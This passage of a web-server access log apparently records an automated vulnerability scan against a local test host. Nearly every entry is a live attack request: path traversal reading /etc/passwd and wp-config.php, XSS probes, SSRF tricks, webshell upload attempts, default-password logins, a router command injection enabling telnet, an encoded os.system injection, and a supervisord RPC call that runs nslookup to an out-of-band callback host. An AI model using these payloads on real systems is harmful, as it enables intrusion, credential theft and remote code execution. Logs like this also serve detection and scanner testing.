+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0Aadmin\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0Apanabit\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/login/login.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"--e64bdf16c554bbc109cecef6451c26a4\x0D\x0AContent-Disposition: form-data; name=\x22Filedata\x22; filename=\x22297MduUVCUdKFw5QNna9MRvLAiP.php\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A--e64bdf16c554bbc109cecef6451c26a4--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.996","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bbpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?host=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc\x0D\x0A CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\x0D\x0AuserDetails","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?file=http://0177.0.0.1/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.221","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Thumbs.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\x22R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\x22))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin/master/console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.axd?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"username=Administrator&password=versa123&sso=systemRadio","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /versa/login HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.997","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/upload/web-ftp.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webpack.config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.228","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.220","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"\x0D\x0A supervisor.supervisord.options.warnings.linecache.os.system\x0D\x0A \x0D\x0A \x0D\x0A nslookup c9v8hn0smpv8c57g0t00a67ued55wqqr5.oast.live\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /RPC2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /JavaScriptServlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /node_modules/mqtt/test/helpers/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/out HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/downmix.inc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like 